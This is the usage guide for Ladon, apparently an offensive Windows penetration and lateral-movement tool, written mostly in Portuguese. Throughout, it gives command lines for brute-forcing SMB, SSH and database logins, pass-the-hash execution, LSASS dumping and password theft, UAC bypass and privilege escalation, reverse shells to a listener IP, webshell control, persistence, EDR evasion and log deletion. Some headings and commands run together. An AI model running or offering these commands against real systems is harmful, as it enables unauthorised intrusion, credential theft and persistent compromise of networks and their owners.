
Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange

Ladon é um scanner de penetração em rede interna de grande porte, ferramenta de penetração em domínio e movimento lateral, módulo PowerShell, plugin Cobalt Strike, carregamento na memória, scan sem arquivos. Inclui varredura de portas, identificação de serviços, detecção de ativos de rede, auditoria de senhas, detecção de vulnerabilidades de alto risco, exploração de vulnerabilidades, leitura de senhas e GetShell com um clique, suporta varredura em lote de segmentos A/B/C e varredura entre segmentos de rede, suporta varredura de listas de URLs, hosts, domínios, etc. A versão 12.2 possui 262 módulos de função integrados, módulo de detecção de ativos de rede com mais de 30 protocolos (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) e métodos para obter rapidamente IPs de hosts ativos, nomes de computador, grupos de trabalho, recursos compartilhados, endereços de placa de rede, versão do sistema operacional, sites, subdomínios, middleware, serviços abertos, roteadores, switches, bancos de dados, impressoras e outras informações da rede alvo, detecção de vulnerabilidades de alto risco 16+ incluindo Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, série Struts2, Printer, etc., auditoria de senhas 25+ incluindo bancos de dados (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar, etc., execução remota de comandos inclui (smbexec/wmiexe/psexec/atexec/sshexec/webshell), módulo de identificação de impressão digital Web pode identificar 135+ (aplicações Web, middleware, tipos de script, tipos de página), etc., elevação de privilégio local 21+ incluindo SweetPotato\BadPotato\EfsPotato\BypassUAC, plugins POC altamente customizáveis suportam plugins escritos em .NET assembly, DLL (C#/Delphi/VC), PowerShell, etc., suporta chamar qualquer programa externo ou comando em lote através de configuração INI, gerador EXP pode gerar POC/EXP de vulnerabilidade com um clique para expandir rapidamente a capacidade de varredura, Ladon suporta carregamento na memória do plugin Cobalt Strike, scan sem arquivos para movimento lateral rápido na rede interna.
https://github.com/k8gege/Ladon/releases https://k8gege.org/Download
### Uso Simples
Embora o Ladon seja rico em funcionalidades, seu uso é muito simples, qualquer pessoa pode começar facilmente<br>
Apenas um ou dois parâmetros permitem usar 90% das funcionalidades, um módulo equivale a uma nova ferramenta.
### Ambiente de Execução
#### Windows
O Ladon pode ser usado em sistemas Windows com .NET 2.0 ou superior (Win7 e posteriores já possuem .NET nativo)<br>
Como Cmd, PowerShell, Cmd de controle remoto, WebShell, etc., e também carregamento em memória no Cobalt Strike<br>
O Ladon.ps1 é perfeitamente compatível com Win7-Win11/2025 PowerShell, sem verificar versão, carregamento remoto sem arquivo para penetração.
#### LadonGo Multiplataforma suporta Linux, Mac, Arm, MIPS
Todas as plataformas: Linux, MacOS, Windows, roteadores, dispositivos de rede e outros sistemas operacionais<br>
https://github.com/k8gege/LadonGo
### Condições Incomuns
Na prática, nem tudo é tão tranquilo, algumas redes internas ficam muito lentas após encaminhamento ou não é possível encaminhar, sendo necessário enviar a ferramenta para o alvo<br>
Alguns cavalos de Troia podem demorar horas para enviar programas de 2-3 MB ou até não conseguir enviar, quanto mais dezenas de MB em Python<br>
O Ladon é desenvolvido em C#, o tamanho do programa é muito pequeno, cerca de 500 KB, mesmo que o cavalo não seja bom, ainda pode enviar um programa de 500 KB<br>
Se ainda não funcionar, pode carregar remotamente na memória via PowerShell, algo que programas grandes compilados em Python ou Go não conseguem igualar.
### Filosofia
Serviço completo, fornecendo ao usuário uma ferramenta de varredura simples, rica em funcionalidades e altamente flexível.
### Características
Baixo tráfego de varredura<br>
Tamanho pequeno do programa<br>
Funcionalidades ricas e poderosas<br>
Programa simples e fácil de usar<br>
Plugins suportam múltiplas linguagens<br>
Multiplataforma (Win/Kali/Ubuntu) etc.<br>
Suporte a plugins no Cobalt Strike<br>
Suporte a penetração sem arquivo via PowerShell<br>
Gerador de Exp pode gerar PoC com um clique<br>
Múltiplas versões adequadas para vários ambientes.
### Funcionalidades dos Parâmetros do Programa
1 Suporte a varredura de IP específico<br>
2 Suporte a varredura de domínio específico<br>
3 Suporte a varredura de nome de máquina específico<br>
4 Suporte a varredura de segmento C específico (ip/24)<br>
5 Suporte a varredura de segmento B específico (ip/16)<br>
6 Suporte a varredura de segmento A específico (ip/8)<br>
7 Suporte a varredura de URL específica<br>
8 Suporte a varredura em lote de IPs (ip.txt)<br>
9 Suporte a varredura em lote de segmentos C (ip24.txt)<br>
10 Suporte a varredura em lote de segmentos C (ipc.txt)<br>
11 Suporte a varredura em lote de segmentos B (ip16.txt)<br>
12 Suporte a varredura em lote de URLs (url.txt)<br>
13 Suporte a varredura em lote de domínios (domain.txt)<br>
14 Suporte a varredura em lote de nomes de máquina (host.txt)<br>
15 Suporte a varredura em lote de segmentos de país (cidr.txt)<br>
16 Suporte a lista de strings em lote (str.txt)<br>
17 Suporte a lista de contas e senhas de hosts (check.txt)<br>
18 Suporte a lista de usuários e senhas (userpass.txt)<br>
19 Suporte a varredura de segmento C em intervalo específico<br>
20 Suporte a carregamento de DLL personalizada via parâmetro (apenas C#)<br>
21 Suporte a carregamento de EXE personalizado via parâmetro (apenas C#)<br>
22 Suporte a carregamento de arquivo de configuração INI personalizado via parâmetro<br>
23 Suporte a carregamento de PowerShell personalizado via parâmetro<br>
24 Suporte a programas personalizados (comandos do sistema ou programas de terceiros, ou seja, programas ou scripts desenvolvidos em qualquer linguagem)<br>
25 Plugins (suportam múltiplas linguagens: C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 Suporte a Cobalt Strike (varredura da rede interna alvo ou varredura de alvos externos via jump host na linha de comando do beacon)<br>
27 Suporte a varredura de IP no formato CIDR, como 100.64.0.0/10, 192.168.1.1/20, etc.<br>
28 Configuração INI suporta quebra de senha de programas personalizados
### Tutorial Rápido de Uso
Tutorial rápido do Ladon Documentação completa: http://k8gege.org/Ladon <br>
Documentação das funções dos módulos Excel: http://k8gege.org/Ladon/wiki.xlsx <br>
Suporte a carregamento em memória via Cmd, Cobalt Strike, PowerShell, etc.<br>
Versão Windows: .Net, Cobalt Strike, PowerShell<br>
Versão para todos os sistemas: Go (multiplataforma), Python (teoricamente multiplataforma)<br>
PS: Study é conveniente para aprendizado local, para funcionalidades completas use CMD.
### Varredura BypassEDR
A varredura padrão é muito rápida, mas alguns WAFs ou EDRs têm defesas fortes<br>
Mesmo configurando alguns threads, pode parar de funcionar após cerca de 20 minutos<br>
bypassEDR simula acesso humano, contornando estratégias de detecção de velocidade<br>
A velocidade de varredura é mais lenta, não use se você é um apressado que só pensa em velocidade.```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR
Módulos relacionados à quebra de senha atualmente não suportam o parâmetro bypassEDR
Exemplo: Verificar se o segmento alvo 10.1.2 possui a vulnerabilidade MS17010
Thread única:```Bash
Ladon 10.1.2.8/24 MS17010 t=1
80 threads:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80
Sob proteção de alta intensidade, defina os threads de varredura mais baixos, F single-thread
```Bash
Ladon 10.1.2.8/24 MS17010 f=1
### 002 Varredura de Proxy Socks5
Exemplo: Usando 8 threads para verificar se o alvo no segmento 10.1.2 possui a vulnerabilidade MS17010<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8
详见:http://k8gege.org/Ladon/proxy.html
PS:As ferramentas de proxy não suportam Socks5, portanto, é necessário adicionar o parâmetro noping para escanear.
Seja Frp ou outras ferramentas similares, o principal é que ferramentas como Proxifier não suportam o protocolo ICMP.
Porque o Ladon primeiro usa ICMP para detectar hosts ativos por padrão, antes de usar os módulos correspondentes para teste.
Portanto, em ambiente de proxy, é necessário desabilitar o escaneamento ping, já que o ping do sistema usa o protocolo ICMP.
Formato CIDR: não apenas /24/16/8 (todos)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块
Formato de letras: apenas seções C, B, A, ordenação sequencial```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块
Ladon 192.168.1.50-192.168.1.200 ICMP
#### Varredura ICMP de hosts ativos de 1.30 a 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP
TXT格式
Ladon ip24.txt ICMP Ladon ipc.txt ICMP
##### 005 Varredura em lote ICMP de hosts ativos na lista do segmento B```Bash
Ladon ip16.txt ICMP
Ladon cidr.txt ICMP
##### 007 ICMP varredura em lote de nomes de domínio para verificar se estão ativos```Bash
Ladon domain.txt ICMP
Ladon host.txt ICMP
##### 009 WhatCMS identificação em lote de CMS, Banner, certificados SSL, títulos, capaz de identificar CMS desconhecidos, roteadores, impressoras, dispositivos de rede, câmeras, etc.```Bash
Ladon 192.168.1.8 WhatCMS 扫描IP
Ladon 192.168.1.8/24 WhatCMS 扫描C段
Ladon 192.168.1.8/C WhatCMS 扫描C段
Ladon 192.168.1.8/B WhatCMS 扫描B段
Ladon 192.168.1.8/A WhatCMS 扫描A段
Ladon IP.TXT WhatCMS 扫描IP列表
Ladon IP24.TXT WhatCMS 扫描C段列表
Ladon IP16.TXT WhatCMS 扫描B段列表
Ladon cidr.TXT WhatCMS 扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS 扫描IP
Ladon noping 192.168.1.8/24 WhatCMS 扫描C段
Ladon url.txt DraytekPoc
##### 011 Decodificação em lote de senhas Base64```Bash
Ladon str.txt DeBase64
Ladon 192.168.1.8/24 ICMP
##### 013 Ping para detectar hosts ativos (chama o comando Ping do sistema, exibe ms, ttl e outras informações)```Bash
Ladon 192.168.1.8/24 Ping
Se você acha que o comando ping responder significa que o host está ativo, pode usar este comando em lote
Ladon 192.168.1.8/24 OnlinePC
##### 015 Identificação do sistema operacional por múltiplos protocolos (IP, nome da máquina, versão do SO, serviços abertos)```Bash
Ladon 192.168.1.8/24 OsInfo
Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo
##### 017 Detecção DNS de host com múltiplas placas de rede```Bash
Ladon 192.168.1.8/24 DnsInfo
Ladon 192.168.1.8/24 OnlineIP
##### 019 Escaneamento de vulnerabilidade SMB MS17010 (IP, nome da máquina, ID da vulnerabilidade, versão do sistema operacional)```Bash
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 SMBGhost
##### 021 Escaneamento de título Web Banner Para informações mais completas, utilize o módulo WhatCMS```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
Ladon 192.168.1.8/24 UrlScan
##### 023 Varredura de URLs e domínios de sites no segmento C```Bash
Ladon 192.168.1.8/24 SameWeb
Ladon baidu.com SubDomain
##### 025 IP de resolução de domínio, IP de resolução de nome de host```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
Ladon domain.txt DomainIP Ladon host.txt HostIP
##### 025 Resolução em lote de nomes de domínio e host - resultado apenas IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
Ladon AdiDnsDump 192.168.1.8
##### 027 Consultar máquinas e IPs no domínio (condição: dentro do domínio)
Ladon GetDomainIP
##### 028 Escaneamento de portas do segmento C, escaneamento de porta específica```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS
##### Escaneamento de Dispositivos Cisco```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
Ladon EnumMssql
##### 032 Enumeração de recursos compartilhados de rede (Domínio, IP, Nome do Host\Caminho Compartilhado)```Bash
Ladon EnumShare
Ladon 192.168.1.8/24 LdapInfo
##### 034 Digitalizar servidor FTP e identificar versão```Bash
Ladon 192.168.1.8/24 FtpInfo
Quebra de senha detalhada consulte SSH: http://k8gege.org/Ladon/sshscan.html
Ladon 192.168.1.8/24 SmbScan
##### 036 porta 135 Wmi força bruta de senha(Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
Ladon 192.168.1.8/24 LdapScan
##### 038 Porta 5985 Brute force de senha WinRM (Windows)```Bash
Ladon 192.168.1.8/24 WinrmScan
Ladon 192.168.1.8/24 SmbHashScan
##### 040 Porta 135 Wmi NTLM HASH Brute Force (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan
##### 042 Porta 1433 Brute-force de senha do banco de dados Mssql```Bash
Ladon 192.168.1.8/24 MssqlScan
Ladon 192.168.1.8/24 OracleScan
O banco de dados Oracle é especial; forçar apenas o banco ORCL pode perder muitas permissões<br>
Veja: http://k8gege.org/Ladon/OracleScan.html<br>
##### 044 Porta 3306 - Força bruta de senha do banco de dados Mysql```Bash
Ladon 192.168.1.8/24 MysqlScan
Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan
##### 046 Porta 5900 – Força bruta de senha do VNC (Área de Trabalho Remota)```Bash
Ladon 192.168.1.8/24 VncScan
Ladon 192.168.1.8/24 FtpScan
##### 048 Porta 8080 Tomcat brute force de senha de login do backend```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan
##### 052 Porta 139 Protocolo NetBIOS Força Bruta de Senha Windows```Bash
Ladon 192.168.1.8/24 NbtScan
Ladon 192.168.1.8/24 WinrmScan
##### 054 Quebra de senha de câmera de rede (senhas padrão integradas)```Bash
Ladon 192.168.1.8/24 DvrScan
Ladon 192.168.1.8/24 MS17010
##### 056 Detecção de vulnerabilidade SMBGhost CVE-2020-0796 911 reservado```Bash
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WeblogicPoc
##### 058 Detecção de backdoor do PhpStudy (phpstudy 2016/phpstudy 2018) 10.9 removido, 911 mantido```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
Ladon 192.168.1.8/24 ActivemqPoc
##### 060 Detecção de vulnerabilidade do Tomcat (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
Ladon 192.168.1.8/24 Struts2Poc
##### 062 DraytekPoc CVE-2020-8515 Detecção de vulnerabilidades, Detecção de versão Draytek, Detecção de senha fraca```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
Ladon 192.168.1.8/24 CVE-2024-55591
### Exploração/Exploit

##### 063 Weblogic Exploração(CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
Ladon 192.168.1.8/24 TomcatExp
##### 065 Gerador de injeção DLL universal para execução de CMD em vulnerabilidades 0day do Windows (DLL apenas 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
##### 067 DraytekExp CVE-2020-8515 Exploit de Execução Remota de Comandos```Bash
Ladon DraytekExp http://192.168.1.8 whoami
Ladon ZeroLogon dc.k8gege.org
##### 069 CVE-2020-0688 Vulnerabilidade de serialização do Exchange (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"
### Download de arquivos, transferência de arquivos
##### 071 Transferência de arquivos na rede interna Download HTTP Download HTTPS Download MSF```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
### Criptografia/Descriptografia (HEX/Base64)
##### 073 Hex Criptografia e Descriptografia```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64
### Sniffing de rede
##### 075 Sniffing de senha FTP (vincular IP local, sniffing automático na sub-rede C)
Máquinas multi-interface, sniffing dos IPs da sub-rede C correspondente```Bash
Ladon FtpSniffer 192.168.1.5
Ladon HTTPSniffer 192.168.1.5
##### 077 farejamento de rede```Bash
Ladon Sniffer
Ladon IISpwd
##### 079 Ler senhas de WIFI conectadas```Bash
Ladon WifiPwd
Ladon FileZillaPwd
##### 081 Ler Hash do sistema, senha VPN, DPAPI-Key 10.9 Remoção```Bash
Ladon CVE-2021-36934
Ladon DumpLsass
### Coleta de Informações

##### 083 API Ver Usuário Atual```Bash
Ladon w
Ladon whoami
Ladon GetIP Ladon IPinfo
##### 084 Obter PCname GUID CPUID DiskID endereço MAC```Bash
Ladon GetID
Ladon Recent
##### 086 Visualização de registros de uso de USB (nome USB, marca USB, informações do caminho)```Bash
Ladon UsbLog
Ladon CheckDoor Ladon AutoRun
##### 088 Detalhes do processo (caminho do programa, bits, parâmetros de inicialização, usuário)```Bash
Ladon EnumProcess
Ladon Tasklist
Ladon cmdline Ladon cmdline cmd.exe
##### 090 Obter informações básicas de penetração```Bash
Ladon GetInfo
Ladon GetInfo2
Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion
##### 092 versão de runtime & ambiente de compilação```Bash
Ladon Ver
Ladon Version
Ladon AllVer Ladon AllVersion
##### 094 Visualizar informações de proxy do IE```Bash
Ladon QueryProxy
Ladon DirList
###### Especificar letra de unidade ou diretório```Bash
Ladon DirList c:\
Ladon QueryAdmin
##### 097 Ver pipes nomeados locais```Bash
Ladon GetPipe
Ladon RdpLog
### Execução remota (psexec/wmiexec/atexec/sshexec/smbexec)

##### Porta 099/445 comando de execução remota PSEXEC criptografado (interativo)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
##### 101 445 portas AtExec execução remota de comando (não interativa)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
##### 103 Execução remota de comandos JspShell (não interativa) removida na versão 9.3.0
Usage: Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo
##### Portas 105 e 135 WmiExec2 execução remota de comandos com suporte a HASH (não interativo) e suporte a upload de arquivos```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe 先Mimikatz注入Hash,再pth执行命令
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
##### 107 WinrmExec Execução Remota de Comando sem Retorno (Suporta Privilégio System)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe
Ladon whoami
##### 109 6 tipos de BypassUAC de lista de permissões (após 8.0) Win7-Win10 Removido na versão 10.8, apenas mantido no 911
Uso: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
10.8 versão removida, apenas 911 mantido.```Bash Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) exploit de escalada de privilégios da vulnerabilidade de impressora```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll
##### 113 GetSystem Elevação de privilégio System e execução de CMD```Bash
Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe explorer
##### 115 Runas Simular execução de comando como usuário```Bash
Ladon Runas user pass cmd
Ladon ms16135 whoami >=9.2.1版本移除 911保留
##### 117 BadPotato Elevação de privilégio de usuário de serviço para SYSTEM```Bash
Ladon BadPotato cmdline
Ladon SweetPotato cmdline
##### 119 EfsPotato Win7-2019 Elevação de privilégios (de usuário de serviço para system)```Bash
Ladon EfsPotato whoami
Ladon Open3389
##### 121 ativar o administrador integrado Administrator```Bash
Ladon ActiveAdmin
Ladon ActiveGuest
### Reverse Shell
##### 123 Reverse TCP NC Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
Ladon ReverseTcp 192.168.1.8 4444 shell
##### 125 Reverso TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
Ladon ReverseHttp 192.168.1.8 4444
##### 127 Shell reverso HTTPS MSF MET```Bash
Ladon ReverseHttps 192.168.1.8 4444
Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh
##### 129 reversoUDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
Ladon netsh add 888 192.168.1.112 22
##### 131 PortTran encaminhamento de portas (exemplo 3389)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338
Ladon RdpHijack 3 Ladon RdpHijack 3 console
##### 133 Adicionar item de inicialização Run do registro```Bash
Ladon RegAuto Test c:\123.exe
Ladon at c:\123.exe Ladon at c:\123.exe gui
##### 135 Serviço SC adicionar item de inicialização & executar programa (privilégios de sistema)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
Ladon 192.168.1.8/24 SnmpInfo
##### 137 Sondagem via protocolo Nbt de nome de host Windows, domínio e usuário```Bash
Ladon 192.168.1.8/24 NbtInfo
Ladon 192.168.1.8/24 SmbInfo
##### 139 Detecção de versão do Windows, nome do host e domínio via protocolo Wmi```Bash
Ladon 192.168.1.8/24 WmiInfo
Ladon 192.168.1.8/24 MssqlInfo
##### 141 Detecção de versão do Windows, hostname e domínio via protocolo Winrm```Bash
Ladon 192.168.1.8/24 WinrmInfo
Ladon 192.168.1.8/24 ExchangeInfo
##### 143 Detecção de versão do Windows, nome do host e domínio via protocolo RDP```Bash
Ladon 192.168.1.8/24 RdpInfo
Ladon EnableDotNet
##### 145 Obter o código-fonte HTML do site da intranet```Bash
Ladon gethtml http://192.168.1.1
Ladon web 80 Ladon web 80 dir
Obter IP externo (iniciar servidor WEB na VPS, alvo acessa ip.txt ou ip.jpg)
http://192.168.1.8/ip.txt
##### 147 getstr/getb64/debase64/savetxt (resultados de eco para vulnerabilidades sem resposta)
##### Monitorar```Bash
Ladon web 800
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
##### Resultado da criptografia Base64```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
##### 148 Detecção de plugin Shiro```Bash
Ladon 192.168.1.8/24 IsShiro
Ladon LogDelTomcat access.log 192.168.1.8
##### 150 Varredura de plug-ins de assembly personalizados em C#```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M
##### 152 Modificar o registro para ler senhas em texto claro de sistemas 2012 e posteriores```Bash
Ladon SetMzLogonPwd 1
Ladon SetSignAuth 1
##### 154 IP24 Converter IPs em lote para o formato ip24 (192.168.1.1/24)```Bash
Ladon ip.txt IP24
Ladon ip.txt IPC
##### 156 IPB Converter IP em lote para formato B (192.168.)```Bash
Ladon ip.txt IPB
Ladon url.txt CVE-2022-26134
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444
##### 160 SslInfo Detecta informações de certificados como dispositivos, IPs, domínios, nomes de máquina e organizações```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo
##### 162 WPinfo Múltiplos métodos para obter as versões do WordPress, temas e plugins```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo
##### 164 Ataque de força bruta ao Exchange Identificar quebra de senha do Exchange```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925
##### 166 EXP-2022-27925 Zimbra servidor de email vulnerabilidade RCE não autorizada EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami
##### JSP UAshell Verifique a versão do sistema, python, gcc e outras informações para facilitar a escalada de privilégios.```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami
##### 169 Comando de execução de backdoor IIS-Raid de conexão não interativa```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 Leitura de senha do roteador```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc
##### 173 Consultar fabricante via MAC (Ladon Mac endereço MAC)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan
##### 175 vsFTPdPoc CVE-2011-2523 vsftpd 2.3.4 Detecção de vulnerabilidade backdoor sorridente 10.9 removido```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc
Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://
##### 177 Detectar versão do Exchange```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
Ladon https://192.168.1.8 ExchangePoc
##### 179 Obter cabeçalhos de resposta HTTP/S```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http 扫描IP时添加http://
Ladon ip.txt GetHead https 扫描IP时添加https://
